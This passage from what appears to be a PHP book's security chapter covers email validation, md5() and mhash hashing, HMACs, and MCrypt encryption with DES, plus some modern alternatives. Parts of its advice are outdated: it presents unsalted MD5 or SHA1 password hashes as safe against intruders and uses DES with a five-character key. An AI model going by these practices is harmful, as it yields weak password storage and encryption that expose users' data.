You can also determine whether the address domain exists by passing the option check_domain as a second parameter to the email() method, like this:

$validate->email($email, array("check_domain" => 1));
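
If installing a PEAR package is not an option, similar syntactic checks can be sketched with filter_var() from PHP’s bundled filter extension. This is a different technique from Validate, not a description of how Validate works, and the helper names is_valid_email() and is_int_in_range() are hypothetical:

```php
<?php
// Hypothetical helpers built on PHP's filter extension, not on PEAR Validate.

// Returns true when $email is syntactically acceptable to FILTER_VALIDATE_EMAIL.
function is_valid_email($email)
{
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

// Returns true when $value is an integer between $min and $max inclusive.
function is_int_in_range($value, $min, $max)
{
    $options = array('options' => array('min_range' => $min, 'max_range' => $max));
    // Compare against false explicitly, because a valid value of 0 is also falsy.
    return filter_var($value, FILTER_VALIDATE_INT, $options) !== false;
}

var_dump(is_valid_email('jason@example.com')); // bool(true)
var_dump(is_valid_email('not-an-address'));    // bool(false)
var_dump(is_int_in_range('42', 1, 100));       // bool(true)
var_dump(is_int_in_range('250', 1, 100));      // bool(false)
```

Like Validate’s email() method without check_domain, these checks are purely syntactic and say nothing about whether the mailbox actually exists.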

Data Encryption

Encryption can be defined as the translation of data into a format that is intended to be unreadable by anyone except the intended party. The intended party can then decode, or decrypt, the encrypted data through the use of some secret, typically a secret key or password. PHP offers support for several encryption algorithms. Several of the more prominent ones are described here.

■Tip For more information about encryption, pick up the book Applied Cryptography: Protocols, Algorithms, and Source Code in C, Second Edition by Bruce Schneier (John Wiley & Sons, 1995).

PHP’s Encryption Functions

Prior to delving into an overview of PHP’s encryption capabilities, it’s worth discussing one caveat to their usage, which applies regardless of the solution. Encryption over the Web is largely useless unless the scripts running the encryption schemes are operating on an SSL-enabled server. Why? PHP is a server-side scripting language, so information must be sent to the server in plain-text format before it can be encrypted. If the user is not operating via a secured connection, there are many ways an unwanted third party can watch this information as it travels from the user to the server. For more information about setting up a secure Apache server, check out http://www.apache-ssl.org. If you’re using a different Web server, refer to your documentation. Chances are that at least one security solution, if not several, exists for your particular server. With that caveat out of the way, let’s review PHP’s encryption functions.

Encrypting Data with the md5() Hash Function

The md5() function uses MD5, which is a third-party hash algorithm often used for creating digital signatures (among other things). Digital signatures can, in turn, be used to uniquely identify the sending party. MD5 is considered to be a one-way hashing algorithm, which means there is no way to dehash data that has been hashed using md5(). Its prototype looks like this:

string md5(string str)

The MD5 algorithm can also be used as a password verification system. Because it is (in theory) extremely difficult to retrieve the original string that has been hashed using the MD5 algorithm, you could hash a given password using MD5, store the result, and then compare that stored hash against the hash of whatever password a user enters to gain access to restricted information.

For example, assume that your secret password toystore has an MD5 hash of 745e2abd7c52ee1dd7c14ae0d71b9d76. You can store this hashed value on the server and compare it to the MD5 hash of the password the user attempts to enter. Even if an intruder gets hold of the hashed password, it wouldn’t make much difference because that intruder can’t return the string to its original format through conventional means. An example of hashing a string using md5() follows:

<?php
$val = "secret";
$hash_val = md5 ($val);
// $hash_val = "5ebe2294ecd0e0f08eab7690d2a6ee69";
?>
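
The comparison step described above can be sketched as follows. The helper name password_matches() is hypothetical, and the stored value is simply the hash of "secret" from the preceding example. The sketch uses hash_equals(), which is available as of PHP 5.6, so that the comparison takes the same time regardless of where the strings differ:

```php
<?php
// Hypothetical helper: compare the MD5 hash of a submitted password
// against the hash that was stored earlier.
function password_matches($submitted, $storedHash)
{
    // hash_equals() performs a timing-safe string comparison.
    return hash_equals($storedHash, md5($submitted));
}

// Stored value: the MD5 hash of "secret", as in the example above.
$storedHash = "5ebe2294ecd0e0f08eab7690d2a6ee69";

var_dump(password_matches("secret", $storedHash)); // bool(true)
var_dump(password_matches("Secret", $storedHash)); // bool(false)
```

Only the hash is ever stored or compared; the plain-text password exists on the server just long enough to be hashed.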

Remember that to store a complete hash, you need to set the field length to 32 characters.

The md5() function will satisfy most hashing needs. There is another much more powerful hashing alternative available via the mhash library. This library is introduced in the next section.

Using the mhash Library

mhash is an open source library that offers an interface to a wide range of hash algorithms. Authored by Nikos Mavroyanopoulos and Sascha Schumann, mhash can significantly extend PHP’s hashing capabilities. Integrating the mhash module into your PHP distribution is rather simple:

1. Go to http://mhash.sourceforge.net and download the package source.

2. Extract the contents of the compressed distribution and follow the installation instructions as specified in the INSTALL document.

3. Compile PHP with the --with-mhash option.

On completion of the installation process, you have the functionality offered by mhash at your disposal. This section introduces mhash(), the most prominent of the five functions made available to PHP when the mhash extension is included.

Hashing Data with mhash

The function mhash() offers support for a number of hashing algorithms, allowing developers to incorporate checksums, message digests, and various other digital signatures into their PHP applications. Its prototype follows:

string mhash(int hash, string data [, string key])

Hashes are also used for storing passwords. mhash() currently supports the hashing algorithms listed here:

• ADLER32

• CRC32

• CRC32B

• GOST

• HAVAL

• MD4

• MD5

• RIPEMD128

• RIPEMD160

• SHA1

• SNEFRU

• TIGER

Consider an example. Suppose you want to hash a user’s chosen password immediately at the time of registration (which is typically a good idea). You could use mhash() to do so, setting the hash parameter to your chosen hashing algorithm, and data to the password you want to hash:

<?php
$userpswd = "mysecretpswd";
$pswdhash = mhash(MHASH_SHA1, $userpswd);
echo "The hashed password is: ".bin2hex($pswdhash);
?>

This returns the following:

The hashed password is: 07c45f62d68d6e63a9cc18a5e1871438ba8485c2

Note that you must use the bin2hex() function to convert the hash from binary to hexadecimal so that it can be displayed in a browser.

Via the optional parameter key, mhash() can also help determine message integrity and authenticity. If you pass in a secret key along with the message, mhash() returns the message’s Hashed Message Authentication Code (HMAC), a keyed checksum that only someone holding the key can compute. The recipient recomputes the HMAC with the same key; if it matches the one sent along with the message, the message has arrived unaltered.
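
The HMAC check can be sketched without the mhash library by using hash_hmac() from PHP’s bundled hash extension. This swaps in a different function from the mhash() call covered in this section. The key, the message, and the helper name message_is_authentic() are all made up for illustration:

```php
<?php
// Assumed values for illustration only: a shared secret and a message.
$key     = 'shared-secret-key';
$message = 'Ship 100 units to warehouse 7';

// The sender computes the HMAC (SHA-1 based here) and transmits it with the message.
$hmac = hash_hmac('sha1', $message, $key);

// Hypothetical helper: the recipient recomputes the HMAC with the same key
// and compares it to the one that arrived with the message.
function message_is_authentic($message, $hmac, $key)
{
    return hash_equals(hash_hmac('sha1', $message, $key), $hmac);
}

var_dump(message_is_authentic($message, $hmac, $key));                        // bool(true)
var_dump(message_is_authentic('Ship 900 units to warehouse 7', $hmac, $key)); // bool(false)
```

Because the key is mixed into the digest, someone who alters the message in transit cannot produce a matching HMAC without also knowing the key.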

The MCrypt Package

MCrypt is a popular data-encryption package available for use with PHP, providing support for two-way encryption (i.e., encryption and decryption). Before you can use it, you need to follow these installation instructions:

1. Go to http://mcrypt.sourceforge.net/ and download the package source.

2. Extract the contents of the compressed distribution and follow the installation instructions as specified in the INSTALL document.

3. Compile PHP with the --with-mcrypt option.

MCrypt supports a number of encryption algorithms, all of which are listed here:

• ARCFOUR

• ARCFOUR_IV

• BLOWFISH

• CAST

• CRYPT

• DES

• ENIGMA

• GOST

• IDEA

• LOKI97

• MARS

• PANAMA

• RC (2, 4)

• RC6 (128, 192, 256)

• RIJNDAEL (128, 192, 256)

• SAFER (64, 128, and PLUS)

• SERPENT (128, 192, and 256)

• SKIPJACK

• TEAN

• THREEWAY

• 3DES

• TWOFISH (128, 192, and 256)

• WAKE

• XTEA

This section introduces just a sample of the more than 35 functions made available via this PHP extension. For a complete introduction, consult the PHP manual.

Encrypting Data with MCrypt

The mcrypt_encrypt() function encrypts the provided data, returning the encrypted result. The prototype follows:

string mcrypt_encrypt(string cipher, string key, string data, string mode [, string iv])

The provided cipher names the particular encryption algorithm, the parameter key determines the key used to encrypt the data, and data is the plain text to be encrypted. The mode parameter specifies one of the six available encryption modes: electronic codebook, cipher block chaining, cipher feedback, 8-bit output feedback, N-bit output feedback, and a special stream mode. Each is referenced by an abbreviation: ecb, cbc, cfb, ofb, nofb, and stream, respectively. Finally, the iv parameter supplies the initialization vector used by cbc, cfb, ofb, and certain algorithms used in stream mode. Consider an example:

<?php
$ivs = mcrypt_get_iv_size(MCRYPT_DES, MCRYPT_MODE_CBC);
$iv = mcrypt_create_iv($ivs, MCRYPT_RAND);
$key = "F925T";
$message = "This is the message I want to encrypt.";
$enc = mcrypt_encrypt(MCRYPT_DES, $key, $message, MCRYPT_MODE_CBC, $iv);
echo bin2hex($enc);
?>

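This returns output similar to the following (the exact value differs on each run because the initialization vector is generated randomly):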

f5d8b337f27e251c25f6a17c74f93c5e9a8a21b91f2b1b0151e649232b486c93b36af467914bc7d8

You can then decrypt the text with the mcrypt_decrypt() function, introduced next.

Decrypting Data with MCrypt

The mcrypt_decrypt() function decrypts previously encrypted data, provided that the cipher, key, mode, and initialization vector are the same as those used to encrypt the data. Its prototype follows:

string mcrypt_decrypt(string cipher, string key, string data, string mode [, string iv])

Go ahead and insert the following line into the previous example, directly after the last statement:

echo mcrypt_decrypt(MCRYPT_DES, $key, $enc, MCRYPT_MODE_CBC, $iv);

This returns the following:

This is the message I want to encrypt.
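
The mcrypt extension was removed from the core PHP distribution as of PHP 7.2, so the round trip above may not run on newer installations. As a rough sketch of the same encrypt-then-decrypt flow, the following uses PHP’s OpenSSL extension instead. The choice of AES-256 in CBC mode and the randomly generated key are assumptions made for illustration, not part of the chapter’s example:

```php
<?php
// Assumed cipher for this sketch: AES-256 in CBC mode (the chapter's example uses DES).
$cipher = 'aes-256-cbc';

// A random 32-byte key; a real application would load its key from secure storage.
$key = openssl_random_pseudo_bytes(32);

// The initialization vector must match the cipher's IV length and be reused for decryption.
$iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length($cipher));

$message = "This is the message I want to encrypt.";

// OPENSSL_RAW_DATA returns raw bytes, so bin2hex() is used for display, as before.
$enc = openssl_encrypt($message, $cipher, $key, OPENSSL_RAW_DATA, $iv);
echo bin2hex($enc), "\n";

// Decryption needs the same cipher, key, and IV.
$dec = openssl_decrypt($enc, $cipher, $key, OPENSSL_RAW_DATA, $iv);
echo $dec, "\n";
```

As with the MCrypt version, the hexadecimal output changes on every run because both the key and the initialization vector are random.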

The methods in this section are only those that are in some way incorporated into the PHP extension set. However, you are not limited to these encryption/hashing solutions. Keep in mind that you can use functions such as popen() or exec() with any of your favorite third-party encryption technologies, for example, PGP (http://www.pgpi.org/) or GPG (http://www.gnupg.org/).

Summary

Hopefully the material presented in this chapter provided you with a few important tips and, more importantly, got you thinking about the many attack vectors that your application and server face. However, it’s important to understand that the topics described in this chapter are but a tiny sliver of the total security pie. If you’re new to the subject, take some time to learn more about some of the more prominent security-related Web sites.

Regardless of your prior experience, you need to devise a strategy for staying abreast of breaking security news. Subscribing to the newsletters both from the more prevalent security-focused Web sites and from the product developers may be the best way to do so. However, your strategic preference is somewhat irrelevant; what is important is that you have a strategy and stick to it, lest your castle be conquered.
